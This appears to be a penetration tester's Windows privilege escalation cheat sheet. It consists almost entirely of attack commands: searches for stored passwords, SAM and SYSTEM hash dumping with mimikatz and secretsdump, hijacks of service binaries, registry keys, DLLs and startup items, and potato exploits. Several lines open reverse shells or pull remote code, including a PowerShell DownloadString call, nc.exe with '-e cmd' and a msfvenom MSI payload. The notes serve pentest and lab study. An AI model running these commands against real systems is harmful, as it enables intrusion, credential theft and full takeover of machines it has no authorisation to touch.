📎 Windows Privesc
Enumeration
# host info
systeminfo
ipconfig /all
route print
netstat -ano
# current user info
whoami
whoami /priv
whoami /groups
whoami /all
# local users info
net user
net user <user>
Get-LocalUser
# local groups info
net localgroup
net localgroup <group>
Get-LocalGroup
# get members
Get-LocalGroupMember <group>
# installed apps (32-bit and 64-bit)
Get-ItemProperty "HKLM:\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\*" | select displayname
Get-ItemProperty "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\*" | select displayname
# running processes
Get-Process
Get-Process | Select-Object Name, Id, Path
# get .NET version
Get-ChildItem 'HKLM:\SOFTWARE\Microsoft\NET Framework Setup\NDP' -Recurse
Interesting Files
# search for a file recursively, including alternate data streams (/r)
dir /r /s <name>.txt
# search for password manager dbs
Get-ChildItem -Path C:\ -Include *.kdbx -File -Recurse -ErrorAction SilentlyContinue
# search for config files in XAMPP
Get-ChildItem -Path C:\xampp -Include *.txt,*.ini -File -Recurse -ErrorAction SilentlyContinue
# search for docs in a user home directory
Get-ChildItem -Path C:\Users\ -Include *.txt,*.xml,*.pdf,*.xls,*.xlsx,*.doc,*.docx -File -Recurse -ErrorAction SilentlyContinue
# search in hidden directories too (-Force)
Get-ChildItem -Path C:\Users\ -Include *.txt, *.xml -File -Recurse -Force -ErrorAction SilentlyContinue
# search for passwords in all files
Get-ChildItem -Path C:\ -Recurse -File -Force -ErrorAction SilentlyContinue | Select-String -Pattern "password" -ErrorAction SilentlyContinue
# search for passwords in specific file types
Get-ChildItem -Path C:\ -Recurse -File -Force -Include "*.txt","*.config","*.json" -ErrorAction SilentlyContinue | Select-String -Pattern "password" -ErrorAction SilentlyContinue
Recycle Bin
# list files in recycle bin
(New-Object -ComObject Shell.Application).NameSpace(0x0a).Items()
# save the file paths to a variable
$pathFile = (New-Object -ComObject Shell.Application).Namespace(0x0a).Items() | Select -ExpandProperty Path
# copy all files
cp $pathFile .
Passwords
PowerShell History
Registry
# the registry can be searched for keys and values containing the word "password":
reg query HKLM /f password /t REG_SZ /s
reg query HKCU /f password /t REG_SZ /s
# admin AutoLogon credentials:
reg query "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon"
Runas with saved credentials
# show stored credentials
cmdkey /list
# transfer a reverse shell and run it with the saved credentials, or launch PowerShell directly
runas /savecred /user:admin reverse.exe
runas /savecred /user:admin "powershell -c IEX (New-Object Net.WebClient).DownloadString('http://<ip>/rshell.ps1')"
RunasCs
Useful for running commands as another user with explicit credentials when those credentials cannot be used in any other way.
Import-Module .\
Invoke-RunasCs <user> <pass> <cmd>
# rev shell
Invoke-RunasCs <user> <pass> powershell.exe -Remote <ip>:<port>
SAM and SYSTEM
Info
🐈⬛ Hashcat mode -> 1000
Find them
# search in the current path
dir /s SAM
dir /s SYSTEM
Get-ChildItem -Filter "SAM" -Recurse -ErrorAction SilentlyContinue
Get-ChildItem -Filter "SYSTEM" -Recurse -ErrorAction SilentlyContinue
# possible locations
%SYSTEMROOT%\repair\SAM
%SYSTEMROOT%\System32\config\RegBack\SAM
%SYSTEMROOT%\System32\config\SAM
%SYSTEMROOT%\repair\system
%SYSTEMROOT%\System32\config\SYSTEM
%SYSTEMROOT%\System32\config\RegBack\system
C:\windows.old
Get the hash
# use pypykatz
pypykatz registry --sam sam system
# or secretsdump
impacket-secretsdump -system SYSTEM -sam SAM local # always mention 'local' in the command
Dumping Local Hashes
Info
Requires SYSTEM privileges
.\mimikatz.exe
privilege::debug
lsadump::sam
reg save HKLM\SAM sam.save
reg save HKLM\SYSTEM system.save
impacket-secretsdump administrator@<target_ip>
Automated Scripts
Services
Binary Hijacking
# list running services
Get-CimInstance -ClassName win32_service | Select Name,State,PathName | Where-Object {$_.State -like 'Running'}
# or in winpeas look for a service
YOU CAN MODIFY THIS SERVICE: AllAccess
File Permissions: Users [WriteData/CreateFiles]
# check permissions (F for full access)
icacls "<path>"
# replace the service binary with a reverse shell or change the binpath to it
sc config <svc_name> binpath="<rshell_path>"
sc stop <svc_name>
sc start <svc_name>
Unquoted Service Paths
# list running and stopped services
Get-CimInstance -ClassName win32_service | Select Name,State,PathName
# or cmd
wmic service get name,pathname | findstr /i /v "C:\Windows\\" | findstr /i /v """"
# check the permissions of every directory in the path with icacls
# upload a malicious file to the path, for example, if the user can write to the 'Current Version' folder:
C:\Program Files\Enterprise Apps\Current Version\GammaServ.exe
# upload the malicious file to that folder, naming it 'current.exe'
# start the service
sc start <svc_name>
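As an added audit helper (not part of the original notes), the Python below computes, for an unquoted service ImagePath, the executable names Windows would try before reaching the real binary and the parent directories whose ACLs therefore need an icacls check; it generalises the single GammaServ.exe case above to any path and skips quoted paths and paths without spaces. The service list is constructed sample data, not output from a real host.

```python
import ntpath
import re
from typing import Dict, List, Tuple

# Constructed sample (Name, PathName) pairs modelled on Get-CimInstance output.
SAMPLE_SERVICES: List[Tuple[str, str]] = [
    ("GammaServ", r"C:\Program Files\Enterprise Apps\Current Version\GammaServ.exe"),
    ("Spooler", r"C:\Windows\System32\spoolsv.exe"),
    ("SafeSvc", r'"C:\Program Files\Safe Vendor\safesvc.exe" -k run'),
    ("Updater", r"C:\Tools\Vendor Updater\upd.exe --service"),
]
# First token ending in .exe, followed by whitespace or end of string.
_EXE_RE = re.compile(r"^(.*?\.exe)(?=\s|$)", re.IGNORECASE)

def unquoted_path_candidates(image_path: str) -> List[str]:
    """Executables Windows would look for, in order, before the real one.
    Quoted paths, paths without spaces, and paths with no locatable .exe
    yield an empty list: nothing to hijack, nothing to audit."""
    path = image_path.strip()
    if not path or path.startswith('"'):
        return []
    match = _EXE_RE.match(path)
    if not match:
        return []
    exe = match.group(1)
    # At each space CreateProcess truncates the string and appends .exe.
    return [exe[:i] + ".exe" for i, ch in enumerate(exe) if ch == " "]

def directories_to_audit(image_path: str) -> List[str]:
    """Parent directories of the candidates; check each one with icacls."""
    dirs: List[str] = []
    for candidate in unquoted_path_candidates(image_path):
        parent = ntpath.dirname(candidate)
        if parent not in dirs:
            dirs.append(parent)
    return dirs

def find_unquoted(services: List[Tuple[str, str]]) -> Dict[str, List[str]]:
    """Map each affected service to its candidates, skipping the Windows dir."""
    findings: Dict[str, List[str]] = {}
    for name, path in services:
        if path.lower().startswith("c:\\windows\\"):  # same filter as the findstr above
            continue
        candidates = unquoted_path_candidates(path)
        if candidates:
            findings[name] = candidates
    return findings
```

For the GammaServ path this yields C:\Program.exe, C:\Program Files\Enterprise.exe and C:\Program Files\Enterprise Apps\Current.exe, so the directories to verify are C:\, C:\Program Files and C:\Program Files\Enterprise Apps.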
Insecure Service Executables
# in winpeas look for a service which has the following
File Permissions: Everyone [AllAccess]
# replace the executable with a malicious file and start the service
sc start <service>
Weak Registry Permissions
# in Winpeas look for a service which has the following
HKLM\system\currentcontrolset\services\<service> (Interactive [FullControl])
# check for KEY_ALL_ACCESS
accesschk /accepteula -uvwqk <path of registry>
# query the service key and identify the value that holds the executable path
reg query <reg-path>
# here that value is ImagePath
reg add HKLM\SYSTEM\CurrentControlSet\services\regsvc /v ImagePath /t REG_EXPAND_SZ /d C:\PrivEsc\reverse.exe /f
sc start <service>
DLL Hijacking
# list apps
Get-ItemProperty "HKLM:\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\*" | select displayname
# check if folder is writable
echo "test" > 'C:\FileZilla\FileZilla FTP Client\test.txt'
type 'C:\FileZilla\FileZilla FTP Client\test.txt'
Using Process Monitor, identify all DLLs the selected app loads, as well as any it looks for but cannot find, and try replacing one with a malicious file.
Transfer the malicious DLL to that path and restart the service.
Scheduled Tasks
# list tasks
schtasks /query /fo LIST /v
Get-ScheduledTask | Select-Object TaskName, TaskPath, State
# use icacls in the path to check permissions
icacls <path>
# upload the malicious file and wait for execution
Startup Apps
Info
For this to work, the system needs to be restarted
# startup applications can be found here
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp
# check if the folder is writable and transfer a reverse shell to it, then reboot the system
shutdown /r /t 0
Insecure GUI Apps
# in Task Manager, check which applications are running with elevated privileges
# open one of them, and from the file menu click 'Open' and enter the following:
file://c:/windows/system32/cmd.exe
Public Exploits and Security Updates
https://github.com/bitsadmin/wesng
https://github.com/SecWiki/windows-kernel-exploits
# enumerate the system
systeminfo
wmic qfe list
Get-HotFix | Sort-Object -Property InstalledOn -Descending
Get-CimInstance -Class win32_quickfixengineering | Where-Object { $_.Description -eq "Security Update" }
systeminfo | findstr /B /C:"KB"
# find a public exploit
searchsploit 'params'
# Windows Exploit Suggester ng
pipx install wesng
wes --update
wes sysinfo # 'sysinfo' is the systeminfo output copied from the Windows host
wes sysinfo -e # show only vulns with exploits
# search in the above repo for usable exploits
Registry
Autorun
# query the registry for executables
reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run
reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Run
# check if the location is writable
accesschk.exe /accepteula -wvu "<path>" # returns FILE_ALL_ACCESS
# replace the executable with the reverse shell and wait for the Admin to log in
AlwaysInstallElevated
Tip
If the file does not execute, check the effective AppLocker policy:
Get-AppLockerPolicy -Effective | Select -ExpandProperty RuleCollections
# query both registry keys; a value of 1 (0x1) means the policy is enabled
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
# create a reverse shell in MSI format
msfvenom -p windows/x64/shell_reverse_tcp LHOST=<IP> LPORT=<port> --platform windows -f msi -o rshell.msi
# run the installer to trigger the shell
msiexec /quiet /qn /i rshell.msi
Privileges
SeImpersonatePrivilege
https://github.com/BeichenDream/GodPotato
https://github.com/antonioCoco/JuicyPotatoNG
# GodPotato
GodPotato.exe -cmd "cmd /c whoami"
GodPotato.exe -cmd "shell.exe"
# check the installed .NET version (GodPotato builds target specific .NET versions)
Get-ChildItem 'HKLM:\SOFTWARE\Microsoft\NET Framework Setup\NDP' -Recurse
# JuicyPotatoNG
JuicyPotatoNG.exe -t * -p "shell.exe" -a
JuicyPotatoNG.exe -t * -p "cmd.exe" -a "/c nc.exe <ip> <port> -e cmd"
# find available ports
JuicyPotatoNG.exe -s
# PrintSpoofer
PrintSpoofer.exe -i -c powershell.exe
PrintSpoofer.exe -c "nc.exe <lhost> <lport> -e cmd"
SeBackupPrivilege
# in backup mode (/b), robocopy can copy data out of folders the user cannot otherwise read
robocopy /b c:\users\enterpriseadmin\desktop . *
# or
# get sam and system
reg save hklm\sam .\sam
reg save hklm\system .\system
# use pypykatz to extract the user hashes (for pass-the-hash), or crack them with hashcat -m 1000
pypykatz registry --sam sam system
# or secretsdump
impacket-secretsdump -system SYSTEM -sam SAM local # always mention local in the command
SeManageVolumePrivilege
Pass the Hash
Info
Remember that the full hash includes both the LM and NTLM hash, separated by a colon.